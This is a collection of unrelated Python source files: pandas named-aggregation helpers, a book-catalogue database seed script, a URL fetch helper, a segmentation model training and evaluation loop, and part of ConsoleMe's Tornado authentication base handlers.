and str/Callable/list of them (e.g. {'A': 'min'}, or {'A': [np.min, lambda x: x]})
If relabeling is True, will return relabeling, reconstructed func, column
names, and the reconstructed order of columns.
If relabeling is False, the columns and order will be None.
Parameters
----------
func: agg function (e.g. 'min' or Callable) or list of agg functions
(e.g. ['min', np.max]) or dictionary (e.g. {'A': ['min', np.max]}).
**kwargs: dict, kwargs used in is_multi_agg_with_relabel and
normalize_keyword_aggregation function for relabelling
Returns
-------
relabelling: bool, if there is relabelling or not
func: normalized and mangled func
columns: list of column names
order: list of columns indices
Examples
--------
>>> reconstruct_func(None, **{"foo": ("col", "min")})
(True, defaultdict(<class 'list'>, {'col': ['min']}), ('foo',), array([0]))
>>> reconstruct_func("min")
(False, 'min', None, None)
"""
relabeling = func is None and is_multi_agg_with_relabel(**kwargs)
columns: list[str] | None = None
order: list[int] | None = None
if not relabeling:
if isinstance(func, list) and len(func) > len(set(func)):
# GH 28426 will raise error if duplicated function names are used and
# there is no reassigned name
raise SpecificationError(
"Function names must be unique if there is no new column names "
"assigned"
)
elif func is None:
# nicer error message
raise TypeError("Must provide 'func' or tuples of '(column, aggfunc).")
if relabeling:
func, columns, order = normalize_keyword_aggregation(kwargs)
return relabeling, func, columns, order
def is_multi_agg_with_relabel(**kwargs) -> bool:
"""
Check whether kwargs passed to .agg look like multi-agg with relabeling.
Parameters
----------
**kwargs : dict
Returns
-------
bool
Examples
--------
>>> is_multi_agg_with_relabel(a="max")
False
>>> is_multi_agg_with_relabel(a_max=("a", "max"), a_min=("a", "min"))
True
>>> is_multi_agg_with_relabel()
False
"""
return all(isinstance(v, tuple) and len(v) == 2 for v in kwargs.values()) and (
len(kwargs) > 0
)
def normalize_keyword_aggregation(kwargs: dict) -> tuple[dict, list[str], list[int]]:
"""
Normalize user-provided "named aggregation" kwargs.
Transforms from the new ``Mapping[str, NamedAgg]`` style kwargs
to the old Dict[str, List[scalar]]].
Parameters
----------
kwargs : dict
Returns
-------
aggspec : dict
The transformed kwargs.
columns : List[str]
The user-provided keys.
col_idx_order : List[int]
List of columns indices.
Examples
--------
>>> normalize_keyword_aggregation({"output": ("input", "sum")})
(defaultdict(<class 'list'>, {'input': ['sum']}), ('output',), array([0]))
"""
from pandas.core.indexes.base import Index
# Normalize the aggregation functions as Mapping[column, List[func]],
# process normally, then fixup the names.
# TODO: aggspec type: typing.Dict[str, List[AggScalar]]
# May be hitting https://github.com/python/mypy/issues/5958
# saying it doesn't have an attribute __name__
aggspec: DefaultDict = defaultdict(list)
order = []
columns, pairs = list(zip(*kwargs.items()))
for column, aggfunc in pairs:
aggspec[column].append(aggfunc)
order.append((column, com.get_callable_name(aggfunc) or aggfunc))
# uniquify aggfunc name if duplicated in order list
uniquified_order = _make_unique_kwarg_list(order)
# GH 25719, due to aggspec will change the order of assigned columns in aggregation
# uniquified_aggspec will store uniquified order list and will compare it with order
# based on index
aggspec_order = [
(column, com.get_callable_name(aggfunc) or aggfunc)
for column, aggfuncs in aggspec.items()
for aggfunc in aggfuncs
]
uniquified_aggspec = _make_unique_kwarg_list(aggspec_order)
# get the new index of columns by comparison
col_idx_order = Index(uniquified_aggspec).get_indexer(uniquified_order)
# error: Incompatible return value type (got "Tuple[defaultdict[Any, Any],
# Any, ndarray]", expected "Tuple[Dict[Any, Any], List[str], List[int]]")
return aggspec, columns, col_idx_order # type: ignore[return-value]
def _make_unique_kwarg_list(
seq: Sequence[tuple[Any, Any]]
) -> Sequence[tuple[Any, Any]]:
"""
Uniquify aggfunc name of the pairs in the order list
Examples:
--------
>>> kwarg_list = [('a', '<lambda>'), ('a', '<lambda>'), ('b', '<lambda>')]
>>> _make_unique_kwarg_list(kwarg_list)
[('a', '<lambda>_0'), ('a', '<lambda>_1'), ('b', '<lambda>')]
"""
return [
(pair[0], "_".join([pair[1], str(seq[:i].count(pair))]))
if seq.count(pair) > 1
else pair
for i, pair in enumerate(seq)
]
def relabel_result(
result: DataFrame | Series,
func: dict[str, list[Callable | str]],
columns: Iterable[Hashable],
order: Iterable[int],
) -> dict[Hashable, Series]:
"""
Internal function to reorder result if relabelling is True for
dataframe.agg, and return the reordered result in dict.
Parameters:
----------
result: Result from aggregation
func: Dict of (column name, funcs)
columns: New columns name for relabelling
order: New order for relabelling
Examples:
---------
>>> result = DataFrame({"A": [np.nan, 2, np.nan],
... "C": [6, np.nan, np.nan], "B": [np.nan, 4, 2.5]}) # doctest: +SKIP
>>> funcs = {"A": ["max"], "C": ["max"], "B": ["mean", "min"]}
>>> columns = ("foo", "aab", "bar", "dat")
>>> order = [0, 1, 2, 3]
    >>> relabel_result(result, funcs, columns, order)  # doctest: +SKIP
dict(A=Series([2.0, NaN, NaN, NaN], index=["foo", "aab", "bar", "dat"]),
C=Series([NaN, 6.0, NaN, NaN], index=["foo", "aab", "bar", "dat"]),
B=Series([NaN, NaN, 2.5, 4.0], index=["foo", "aab", "bar", "dat"]))
"""
from pandas.core.indexes.base import Index
reordered_indexes = [
pair[0] for pair in sorted(zip(columns, order), key=lambda t: t[1])
]
reordered_result_in_dict: dict[Hashable, Series] = {}
idx = 0
reorder_mask = not isinstance(result, ABCSeries) and len(result.columns) > 1
for col, fun in func.items():
s = result[col].dropna()
# In the `_aggregate`, the callable names are obtained and used in `result`, and
# these names are ordered alphabetically. e.g.
# C2 C1
# <lambda> 1 NaN
# amax NaN 4.0
# max NaN 4.0
# sum 18.0 6.0
        # Therefore, the order of functions for each column could be shuffled;
        # we need the callable names (when the functions are not plain strings)
        # so that the aggregated result for each column can be reordered to
        # match its functions.
# e.g. if df.agg(c1=("C2", sum), c2=("C2", lambda x: min(x))), correct order is
# [sum, <lambda>], but in `result`, it will be [<lambda>, sum], and we need to
# reorder so that aggregated values map to their functions regarding the order.
        # However, when only one column is used for aggregation there is no need
        # to reorder, since the index is not sorted, and it is kept as-is in `funcs`, e.g.
# A
# min 1.0
# mean 1.5
# mean 1.5
if reorder_mask:
fun = [
com.get_callable_name(f) if not isinstance(f, str) else f for f in fun
]
col_idx_order = Index(s.index).get_indexer(fun)
s = s[col_idx_order]
# assign the new user-provided "named aggregation" as index names, and reindex
# it based on the whole user-provided names.
s.index = reordered_indexes[idx : idx + len(fun)]
reordered_result_in_dict[col] = s.reindex(columns, copy=False)
idx = idx + len(fun)
return reordered_result_in_dict
# TODO: Can't use, because mypy doesn't like us setting __name__
# error: "partial[Any]" has no attribute "__name__"
# the type is:
# typing.Sequence[Callable[..., ScalarResult]]
# -> typing.Sequence[Callable[..., ScalarResult]]:
def _managle_lambda_list(aggfuncs: Sequence[Any]) -> Sequence[Any]:
"""
Possibly mangle a list of aggfuncs.
Parameters
----------
aggfuncs : Sequence
Returns
-------
mangled: list-like
A new AggSpec sequence, where lambdas have been converted
to have unique names.
Notes
-----
If just one aggfunc is passed, the name will not be mangled.
"""
if len(aggfuncs) <= 1:
# don't mangle for .agg([lambda x: .])
return aggfuncs
i = 0
mangled_aggfuncs = []
for aggfunc in aggfuncs:
if com.get_callable_name(aggfunc) == "<lambda>":
aggfunc = partial(aggfunc)
aggfunc.__name__ = f"<lambda_{i}>"
i += 1
mangled_aggfuncs.append(aggfunc)
return mangled_aggfuncs
def maybe_mangle_lambdas(agg_spec: Any) -> Any:
"""
Make new lambdas with unique names.
Parameters
----------
agg_spec : Any
An argument to GroupBy.agg.
    Non-dict-like `agg_spec` is passed through as-is.
For dict-like `agg_spec` a new spec is returned
with name-mangled lambdas.
Returns
-------
mangled : Any
Same type as the input.
Examples
--------
>>> maybe_mangle_lambdas('sum')
'sum'
>>> maybe_mangle_lambdas([lambda: 1, lambda: 2]) # doctest: +SKIP
[<function __main__.<lambda_0>,
<function pandas...._make_lambda.<locals>.f(*args, **kwargs)>]
"""
is_dict = is_dict_like(agg_spec)
if not (is_dict or is_list_like(agg_spec)):
return agg_spec
mangled_aggspec = type(agg_spec)() # dict or OrderedDict
if is_dict:
for key, aggfuncs in agg_spec.items():
if is_list_like(aggfuncs) and not is_dict_like(aggfuncs):
mangled_aggfuncs = _managle_lambda_list(aggfuncs)
else:
mangled_aggfuncs = aggfuncs
mangled_aggspec[key] = mangled_aggfuncs
else:
mangled_aggspec = _managle_lambda_list(agg_spec)
return mangled_aggspec
def validate_func_kwargs(
kwargs: dict,
) -> tuple[list[str], list[str | Callable[..., Any]]]:
"""
Validates types of user-provided "named aggregation" kwargs.
`TypeError` is raised if aggfunc is not `str` or callable.
Parameters
----------
kwargs : dict
Returns
-------
columns : List[str]
        List of user-provided keys.
func : List[Union[str, callable[...,Any]]]
List of user-provided aggfuncs
Examples
--------
>>> validate_func_kwargs({'one': 'min', 'two': 'max'})
(['one', 'two'], ['min', 'max'])
"""
tuple_given_message = "func is expected but received {} in **kwargs."
columns = list(kwargs)
func = []
for col_func in kwargs.values():
if not (isinstance(col_func, str) or callable(col_func)):
raise TypeError(tuple_given_message.format(type(col_func).__name__))
func.append(col_func)
if not columns:
no_arg_message = "Must provide 'func' or named aggregation **kwargs."
raise TypeError(no_arg_message)
return columns, func
|
py | b411113c03c91effd3f04585278348e4775bb415 | """
Populates the db with some data
Used for dev purposes
"""
# [START imports]
from database import db_session, User, Category, Book
# [END imports]
# Add User
user1 = User(name="Mr. Clement DuBuque", email="[email protected]")
db_session.add(user1)
db_session.commit()
user2 = User(name="Tressie Bernier", email="[email protected]")
db_session.add(user2)
db_session.commit()
# Add categories no users = dev 1
# category1 = Category(name="Autobiography")
# db_session.add(category1)
# db_session.commit()
# category2 = Category(name="Web Development")
# db_session.add(category2)
# db_session.commit()
# category3 = Category(name="Science Fiction")
# db_session.add(category3)
# db_session.commit()
# Add categories with users = dev 2
category1 = Category(name="Autobiography", user=user1)
db_session.add(category1)
db_session.commit()
category2 = Category(name="Web Development", user=user1)
db_session.add(category2)
db_session.commit()
category3 = Category(name="Science Fiction", user=user2)
db_session.add(category3)
db_session.commit()
category4 = Category(name="Sport", user=user2)
db_session.add(category4)
db_session.commit()
category5 = Category(name="Thrillers", user=user1)
db_session.add(category5)
db_session.commit()
category6 = Category(name="Nature", user=user2)
db_session.add(category6)
db_session.commit()
category7 = Category(name="Business", user=user1)
db_session.add(category7)
db_session.commit()
# Add Autobiography books; remove user if dev 1
bookItem1 = Book(name="Steve Jobs: A Biography",
description="Driven by demons, Jobs could drive those around "
"him to fury and despair. But his personality and products "
"were interrelated, just as Apples hardware and software "
"tended to be, as if part of an integrated system. His tale "
"is instructive and cautionary, filled with lessons about "
"innovation, character, leadership, and values.",
author="Walter Isaacson",
price="9.99", category=category1, user=user1)
db_session.add(bookItem1)
db_session.commit()
# Add web dev books; remove user if dev 1
bookItem2 = Book(name="Automate the Boring Stuff",
description="Practical programming for total beginners. In "
"Automate the Boring Stuff with Python, you'll learn how to "
"use Python to write programs that do in minutes what would "
"take you hours to do by hand-no prior programming "
"experience required.",
author="Al Sweigart", price="14.99", category=category2,
user=user1)
db_session.add(bookItem2)
db_session.commit()
bookItem3 = Book(name="Javascript and jQuery",
description="Welcome to a nicer way to learn Javascript "
"& jQuery",
author="John Duckett", price="19.99", category=category2,
user=user1)
db_session.add(bookItem3)
db_session.commit()
bookItem4 = Book(name="Learn Python the Hard Way",
description="Zed Shaw has perfected the world's best "
"system for learning Python. Follow it and you will "
"succeed-just like the hundreds of thousands of beginners "
"Zed has taught to date! You bring the discipline, "
"commitment, and persistence; the author supplies "
"everything else. ",
author="Zed Shaw", price="18.99", category=category2,
user=user1)
db_session.add(bookItem4)
db_session.commit()
bookItem5 = Book(name="Python for Data Analysis",
description="Python for Data Analysis is concerned with "
"the nuts and bolts of manipulating, processing, cleaning, "
"and crunching data in Python. It is also a practical, "
"modern introduction to scientific computing in Python, "
"tailored for data-intensive applications.",
author="Wes McKinney", price="9.99", category=category2,
user=user1)
db_session.add(bookItem5)
db_session.commit()
bookItem6 = Book(name="Hacking: Beginner to Expert Guide",
description="This book will teach you how you can protect "
"yourself from most common hacking attacks -- by knowing "
"how hacking actually works!",
author="James Patterson", price="1.99", category=category2,
user=user2)
db_session.add(bookItem6)
db_session.commit()
bookItem7 = Book(name="Make Your Own Neural Network",
description="A step-by-step gentle journey through the "
"mathematics of neural networks, and making your own "
"using the Python computer language.",
author="Tariq Rashid", price="24.99", category=category2,
user=user1)
db_session.add(bookItem7)
db_session.commit()
# Add sci fi books; remove user if dev 1
bookItem8 = Book(name="Wool",
description="Thousands of them have lived underground."
"They've lived there so long, there are only legends about "
"people living anywhere else. Such a life requires rules. "
"Strict rules. There are things that must not be discussed. "
"Like going outside. Never mention you might like going "
"outside.",
author="Hugh Howey",
price="3.99", category=category3, user=user2)
db_session.add(bookItem8)
db_session.commit()
# Add thriller books; remove user if dev 1
bookItem9 = Book(name="Night School: A Jack Reacher Novel",
description="It is 1996, and Reacher is still in the army.",
author="Lee Child", price="7.99", category=category5,
user=user1)
db_session.add(bookItem9)
db_session.commit()
bookItem10 = Book(name="The Girl on the Train",
description="Rachel catches the same commuter train every "
"morning. She knows it will wait at the same signal each "
"time, overlooking a row of back gardens. She is even "
"started to feel like she knows the people who live in "
"one of the houses. Jess and Jason, she calls them. "
"Their life, as she sees it, is perfect. "
"If only Rachel could be that happy.",
author="Paula Hawkins", price="4.99", category=category5,
user=user1)
db_session.add(bookItem10)
db_session.commit()
|
py | b411119ba576ae7cddd067a083256986df127a5b | #
# (c) 2016 Ruben Schmidmeister
#
from urllib import request
def fetch(url):
    # Accumulate raw bytes and decode once at the end so that multi-byte UTF-8
    # sequences are never split across chunk boundaries.
    data = b''
    response = request.urlopen(url)
    while True:
        chunk = response.read(8192)
        if not chunk:
            break
        data = data + chunk
    return data.decode('utf8')
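# Example usage (URL is illustrative):
#   html = fetch('https://example.com/')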
|
py | b41112016dc9fa35d3e6c4a811871cd7f6293a15 | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Ke Sun ([email protected])
# ------------------------------------------------------------------------------
import logging
import os
import time
import numpy as np
import numpy.ma as ma
from tqdm import tqdm
import torch
import torch.nn as nn
from torch.nn import functional as F
from .utils.utils import AverageMeter
from .utils.utils import get_confusion_matrix
from .utils.utils import adjust_learning_rate
def train(config, epoch, num_epoch, epoch_iters, base_lr,
num_iters, trainloader, optimizer, model, writer_dict):
# Training
model.train()
batch_time = AverageMeter()
ave_loss = AverageMeter()
tic = time.time()
cur_iters = epoch*epoch_iters
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
for i_iter, batch in enumerate(trainloader, 0):
images, labels, _, _ = batch
images = images.cuda()
labels = labels.long().cuda()
losses, _ = model(images, labels)
loss = losses.mean()
model.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - tic)
tic = time.time()
# update average loss
ave_loss.update(loss.item())
lr = adjust_learning_rate(optimizer,
base_lr,
num_iters,
i_iter+cur_iters)
if i_iter % config.PRINT_FREQ == 0:
msg = 'Epoch: [{}/{}] Iter:[{}/{}], Time: {:.2f}, ' \
'lr: {:.6f}, Loss: {:.6f}' .format(
epoch, num_epoch, i_iter, epoch_iters,
batch_time.average(), lr, ave_loss.average())
logging.info(msg)
writer.add_scalar('train_loss', ave_loss.average(), global_steps)
writer_dict['train_global_steps'] = global_steps + 1
def validate(config, testloader, model, writer_dict):
model.eval()
ave_loss = AverageMeter()
confusion_matrix = np.zeros(
(config.DATASET.NUM_CLASSES, config.DATASET.NUM_CLASSES))
with torch.no_grad():
for _, batch in enumerate(testloader):
image, label, _, _ = batch
size = label.size()
label = label.long().cuda()
losses, pred = model(image, label)
pred = F.upsample(input=pred, size=(
size[-2], size[-1]), mode='bilinear')
loss = losses.mean()
ave_loss.update(loss.item())
confusion_matrix += get_confusion_matrix(
label,
pred,
size,
config.DATASET.NUM_CLASSES,
config.TRAIN.IGNORE_LABEL)
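    # Per-class IoU from the accumulated confusion matrix: tp is the diagonal
    # (true positives) and pos/res are the per-class row/column totals, so
    # IoU = tp / (pos + res - tp), i.e. TP / (TP + FP + FN).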
pos = confusion_matrix.sum(1)
res = confusion_matrix.sum(0)
tp = np.diag(confusion_matrix)
IoU_array = (tp / np.maximum(1.0, pos + res - tp))
mean_IoU = IoU_array.mean()
writer = writer_dict['writer']
global_steps = writer_dict['valid_global_steps']
writer.add_scalar('valid_loss', ave_loss.average(), global_steps)
writer.add_scalar('valid_mIoU', mean_IoU, global_steps)
writer_dict['valid_global_steps'] = global_steps + 1
return ave_loss.average(), mean_IoU, IoU_array
def testval(config, test_dataset, testloader, model,
sv_dir='', sv_pred=False):
model.eval()
confusion_matrix = np.zeros(
(config.DATASET.NUM_CLASSES, config.DATASET.NUM_CLASSES))
with torch.no_grad():
for index, batch in enumerate(tqdm(testloader)):
image, label, _, name = batch
size = label.size()
pred = test_dataset.multi_scale_inference(
model,
image,
scales=config.TEST.SCALE_LIST,
flip=config.TEST.FLIP_TEST)
if pred.size()[-2] != size[-2] or pred.size()[-1] != size[-1]:
pred = F.upsample(pred, (size[-2], size[-1]),
mode='bilinear')
confusion_matrix += get_confusion_matrix(
label,
pred,
size,
config.DATASET.NUM_CLASSES,
config.TRAIN.IGNORE_LABEL)
if sv_pred:
sv_path = os.path.join(sv_dir,'test_results')
if not os.path.exists(sv_path):
os.mkdir(sv_path)
test_dataset.save_pred(pred, sv_path, name)
if index % 100 == 0:
logging.info('processing: %d images' % index)
pos = confusion_matrix.sum(1)
res = confusion_matrix.sum(0)
tp = np.diag(confusion_matrix)
IoU_array = (tp / np.maximum(1.0, pos + res - tp))
mean_IoU = IoU_array.mean()
logging.info('mIoU: %.4f' % (mean_IoU))
pos = confusion_matrix.sum(1)
res = confusion_matrix.sum(0)
tp = np.diag(confusion_matrix)
pixel_acc = tp.sum()/pos.sum()
mean_acc = (tp/np.maximum(1.0, pos)).mean()
IoU_array = (tp / np.maximum(1.0, pos + res - tp))
mean_IoU = IoU_array.mean()
return mean_IoU, IoU_array, pixel_acc, mean_acc
def test(config, test_dataset, testloader, model,
sv_dir='', sv_pred=True):
model.eval()
with torch.no_grad():
for _, batch in enumerate(tqdm(testloader)):
image, size, name = batch
size = size[0]
pred = test_dataset.multi_scale_inference(
model,
image,
scales=config.TEST.SCALE_LIST,
flip=config.TEST.FLIP_TEST)
if pred.size()[-2] != size[0] or pred.size()[-1] != size[1]:
pred = F.upsample(pred, (size[-2], size[-1]),
mode='bilinear')
if sv_pred:
sv_path = os.path.join(sv_dir,'test_results')
if not os.path.exists(sv_path):
os.mkdir(sv_path)
test_dataset.save_pred(pred, sv_path, name) |
py | b4111389dcd3e081f294f14b5c31e2581a1dc4e5 | """Handle the base."""
import asyncio
import time
import traceback
import uuid
from datetime import datetime, timedelta
from typing import Any, Union
import pytz
import redis
import tornado.httpclient
import tornado.httputil
import tornado.web
import ujson as json
from tornado import httputil
from consoleme.config import config
from consoleme.exceptions.exceptions import (
InvalidCertificateException,
MissingCertificateException,
MissingConfigurationValue,
NoGroupsException,
NoUserException,
SilentException,
WebAuthNError,
)
from consoleme.lib.alb_auth import authenticate_user_by_alb_auth
from consoleme.lib.auth import AuthenticationError
from consoleme.lib.jwt import generate_jwt_token, validate_and_return_jwt_token
from consoleme.lib.oidc import authenticate_user_by_oidc
from consoleme.lib.plugins import get_plugin_by_name
from consoleme.lib.redis import RedisHandler
from consoleme.lib.saml import authenticate_user_by_saml
from consoleme.lib.tracing import ConsoleMeTracer
log = config.get_logger()
stats = get_plugin_by_name(config.get("plugins.metrics", "default_metrics"))()
auth = get_plugin_by_name(config.get("plugins.auth", "default_auth"))()
group_mapping = get_plugin_by_name(
config.get("plugins.group_mapping", "default_group_mapping")
)()
class TornadoRequestHandler(tornado.web.RequestHandler):
def get_request_ip(self):
trusted_remote_ip_header = config.get("auth.remote_ip.trusted_remote_ip_header")
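        # Example (header name is deployment-specific): with the trusted header
        # set to "X-Forwarded-For", a value of "1.2.3.4, 10.0.0.1" resolves to
        # the client IP "1.2.3.4".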
if trusted_remote_ip_header:
return self.request.headers[trusted_remote_ip_header].split(",")[0]
return self.request.remote_ip
class BaseJSONHandler(TornadoRequestHandler):
# These methods are returned in OPTIONS requests.
# Default methods can be overridden by setting this variable in child classes.
allowed_methods = ["GET", "HEAD", "PUT", "PATCH", "POST", "DELETE"]
def __init__(self, *args, **kwargs):
self.jwt_validator = kwargs.pop("jwt_validator", None)
self.auth_required = kwargs.pop("auth_required", True)
if self.jwt_validator is None:
raise TypeError("Missing required keyword arg jwt_validator")
super().__init__(*args, **kwargs)
def check_xsrf_cookie(self):
# CSRF token is not needed since this is protected by raw OIDC tokens
pass
def options(self, *args):
self.set_header(
"Access-Control-Allow-Headers",
self.request.headers["Access-Control-Request-Headers"],
)
self.set_header("Content-Length", "0")
self.set_status(204)
self.finish()
async def prepare(self):
stats.timer("base_handler.incoming_request")
if self.request.method.lower() == "options":
return
self.request_uuid = str(uuid.uuid4())
payload = self.get_current_user()
self.auth_context = payload
self.user = payload["email"]
def set_default_headers(self, *args, **kwargs):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Methods", ",".join(self.allowed_methods))
self.set_header("Access-Control-Allow-Credentials", "true")
self.set_header("Content-Type", "application/json")
def write_error(self, status_code, **kwargs):
self.set_header("Content-Type", "application/problem+json")
title = httputil.responses.get(status_code, "Unknown")
message = kwargs.get("message", self._reason)
# self.set_status() modifies self._reason, so this call should come after we grab the reason
self.set_status(status_code)
self.finish(
json.dumps(
{"status": status_code, "title": title, "message": message}
) # noqa
)
def get_current_user(self):
try:
if config.get("development") and config.get("json_authentication_override"):
return config.get("json_authentication_override")
tkn_header = self.request.headers["authorization"]
except KeyError:
raise WebAuthNError(reason="Missing Authorization Header")
else:
tkn_str = tkn_header.split(" ")[-1]
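            # e.g. "Bearer eyJ..." (token value illustrative): only the final
            # whitespace-separated part is handed to the JWT validator.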
try:
tkn = self.jwt_validator(tkn_str)
except AuthenticationError as e:
raise WebAuthNError(reason=e.message)
else:
return tkn
class BaseHandler(TornadoRequestHandler):
"""Default BaseHandler."""
def log_exception(self, *args, **kwargs):
if args[0].__name__ == "SilentException":
pass
else:
super(BaseHandler, self).log_exception(*args, **kwargs)
def write_error(self, status_code: int, **kwargs: Any) -> None:
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
# in debug mode, try to send a traceback
self.set_header("Content-Type", "text/plain")
for line in traceback.format_exception(*kwargs["exc_info"]):
self.write(line)
self.finish()
else:
self.finish(
"<html><title>%(code)d: %(message)s</title>"
"<body>%(code)d: %(message)s</body></html>"
% {
"code": status_code,
"message": f"{self._reason} - {config.get('errors.custom_website_error_message', '')}",
}
)
def data_received(self, chunk):
"""Receives the data."""
pass
def initialize(self, **kwargs) -> None:
self.kwargs = kwargs
self.tracer = None
self.responses = []
super(BaseHandler, self).initialize()
async def prepare(self) -> None:
self.tracer = None
await self.configure_tracing()
if config.get("tornado.xsrf", True):
cookie_kwargs = config.get("tornado.xsrf_cookie_kwargs", {})
self.set_cookie(
config.get("xsrf_cookie_name", "_xsrf"),
self.xsrf_token,
**cookie_kwargs,
)
self.request_uuid = str(uuid.uuid4())
stats.timer("base_handler.incoming_request")
return await self.authorization_flow()
def write(self, chunk: Union[str, bytes, dict]) -> None:
if config.get("_security_risk_full_debugging.enabled"):
if not hasattr(self, "responses"):
self.responses = []
self.responses.append(chunk)
super(BaseHandler, self).write(chunk)
async def configure_tracing(self):
self.tracer = ConsoleMeTracer()
primary_span_name = "{0} {1}".format(
self.request.method.upper(), self.request.path
)
tracer_tags = {
"http.host": config.hostname,
"http.method": self.request.method.upper(),
"http.path": self.request.path,
"ca": self.get_request_ip(), # Client IP
"http.url": self.request.full_url(),
}
tracer = await self.tracer.configure_tracing(
primary_span_name, tags=tracer_tags
)
if tracer:
for k, v in tracer.headers.items():
self.set_header(k, v)
def on_finish(self) -> None:
if hasattr(self, "tracer") and self.tracer:
asyncio.ensure_future(
self.tracer.set_additional_tags({"http.status_code": self.get_status()})
)
asyncio.ensure_future(self.tracer.finish_spans())
asyncio.ensure_future(self.tracer.disable_tracing())
if config.get("_security_risk_full_debugging.enabled"):
responses = None
if hasattr(self, "responses"):
responses = self.responses
request_details = {
"path": self.request.path,
"method": self.request.method,
"body": self.request.body,
"arguments": self.request.arguments,
"body_arguments": self.request.body_arguments,
"headers": dict(self.request.headers.items()),
"query": self.request.query,
"query_arguments": self.request.query_arguments,
"uri": self.request.uri,
"cookies": dict(self.request.cookies.items()),
"response": responses,
}
with open(config.get("_security_risk_full_debugging.file"), "a+") as f:
f.write(json.dumps(request_details, reject_bytes=False))
super(BaseHandler, self).on_finish()
async def attempt_sso_authn(self) -> bool:
"""
ConsoleMe's configuration allows authenticating users by user/password, SSO, or both.
This function helps determine how ConsoleMe should authenticate a user. If user/password login is allowed,
users will be redirected to ConsoleMe's login page (/login). If SSO is also allowed, the Login page will present
a button allowing the user to sign in with SSO.
        If user/password login is disabled, users are authenticated through SSO directly,
        skipping the extra step of visiting the login page.
        When both user/password and SSO are enabled, this function tells the caller whether
        the current request should go through the SSO flow (an explicit use_sso request or a
        redirect back from the SSO/SAML provider) or be sent to the login page instead.
Returns: boolean
"""
if not config.get("auth.get_user_by_password", False):
return True
# force_use_sso indicates the user's intent to authenticate via SSO
force_use_sso = self.request.arguments.get("use_sso", [False])[0]
if force_use_sso:
return True
# It's a redirect from an SSO provider. Let it hit the SSO functionality
if (
"code" in self.request.query_arguments
and "state" in self.request.query_arguments
):
return True
if self.request.path == "/saml/acs":
return True
return False
async def authorization_flow(
self, user: str = None, console_only: bool = True, refresh_cache: bool = False
) -> None:
"""Perform high level authorization flow."""
self.eligible_roles = []
self.eligible_accounts = []
self.request_uuid = str(uuid.uuid4())
refresh_cache = (
self.request.arguments.get("refresh_cache", [False])[0] or refresh_cache
)
attempt_sso_authn = await self.attempt_sso_authn()
refreshed_user_roles_from_cache = False
if not refresh_cache and config.get(
"dynamic_config.role_cache.always_refresh_roles_cache", False
):
refresh_cache = True
self.red = await RedisHandler().redis()
self.ip = self.get_request_ip()
self.user = user
self.groups = None
self.user_role_name = None
self.auth_cookie_expiration = 0
log_data = {
"function": "Basehandler.authorization_flow",
"ip": self.ip,
"request_path": self.request.uri,
"user-agent": self.request.headers.get("User-Agent"),
"request_id": self.request_uuid,
"message": "Incoming request",
}
log.debug(log_data)
# Check to see if user has a valid auth cookie
if config.get("auth_cookie_name", "consoleme_auth"):
auth_cookie = self.get_cookie(
config.get("auth_cookie_name", "consoleme_auth")
)
# Validate auth cookie and use it to retrieve group information
if auth_cookie:
res = await validate_and_return_jwt_token(auth_cookie)
if res and isinstance(res, dict):
self.user = res.get("user")
self.groups = res.get("groups")
self.auth_cookie_expiration = res.get("exp")
if not self.user:
            # Check for development mode and configuration overrides that specify the user and their groups.
if config.get("development") and config.get("_development_user_override"):
self.user = config.get("_development_user_override")
if config.get("development") and config.get("_development_groups_override"):
self.groups = config.get("_development_groups_override")
if not self.user:
# SAML flow. If user has a JWT signed by ConsoleMe, and SAML is enabled in configuration, user will go
# through this flow.
if config.get("auth.get_user_by_saml", False) and attempt_sso_authn:
res = await authenticate_user_by_saml(self)
if not res:
if (
self.request.uri != "/saml/acs"
and not self.request.uri.startswith("/auth?")
):
raise SilentException(
"Unable to authenticate the user by SAML. "
"Redirecting to authentication endpoint"
)
return
if not self.user:
if config.get("auth.get_user_by_oidc", False) and attempt_sso_authn:
res = await authenticate_user_by_oidc(self)
if not res:
raise SilentException(
"Unable to authenticate the user by OIDC. "
"Redirecting to authentication endpoint"
)
if res and isinstance(res, dict):
self.user = res.get("user")
self.groups = res.get("groups")
if not self.user:
if config.get("auth.get_user_by_aws_alb_auth", False):
res = await authenticate_user_by_alb_auth(self)
if not res:
raise Exception("Unable to authenticate the user by ALB Auth")
if res and isinstance(res, dict):
self.user = res.get("user")
self.groups = res.get("groups")
if not self.user:
# Username/Password authn flow
if config.get("auth.get_user_by_password", False):
after_redirect_uri = self.request.arguments.get("redirect_url", [""])[0]
if after_redirect_uri and isinstance(after_redirect_uri, bytes):
after_redirect_uri = after_redirect_uri.decode("utf-8")
self.set_status(403)
self.write(
{
"type": "redirect",
"redirect_url": f"/login?redirect_after_auth={after_redirect_uri}",
"reason": "unauthenticated",
"message": "User is not authenticated. Redirect to authenticate",
}
)
await self.finish()
raise SilentException(
"Redirecting user to authenticate by username/password."
)
if not self.user:
try:
# Get user. Config options can specify getting username from headers or
# OIDC, but custom plugins are also allowed to override this.
self.user = await auth.get_user(headers=self.request.headers)
if not self.user:
raise NoUserException(
f"User not detected. Headers: {self.request.headers}"
)
log_data["user"] = self.user
except NoUserException:
self.clear()
self.set_status(403)
stats.count(
"Basehandler.authorization_flow.no_user_detected",
tags={
"request_path": self.request.uri,
"ip": self.ip,
"user_agent": self.request.headers.get("User-Agent"),
},
)
log_data["message"] = "No user detected. Check configuration."
log.error(log_data)
await self.finish(log_data["message"])
raise
self.contractor = config.config_plugin().is_contractor(self.user)
if config.get("auth.cache_user_info_server_side", True) and not refresh_cache:
try:
cache_r = self.red.get(f"USER-{self.user}-CONSOLE-{console_only}")
except redis.exceptions.ConnectionError:
cache_r = None
if cache_r:
log_data["message"] = "Loading from cache"
log.debug(log_data)
cache = json.loads(cache_r)
self.groups = cache.get("groups")
self.eligible_roles = cache.get("eligible_roles")
self.eligible_accounts = cache.get("eligible_accounts")
self.user_role_name = cache.get("user_role_name")
refreshed_user_roles_from_cache = True
try:
if not self.groups:
self.groups = await auth.get_groups(
self.user, headers=self.request.headers
)
if not self.groups:
raise NoGroupsException(
f"Groups not detected. Headers: {self.request.headers}"
)
except NoGroupsException:
stats.count("Basehandler.authorization_flow.no_groups_detected")
log_data["message"] = "No groups detected. Check configuration."
log.error(log_data)
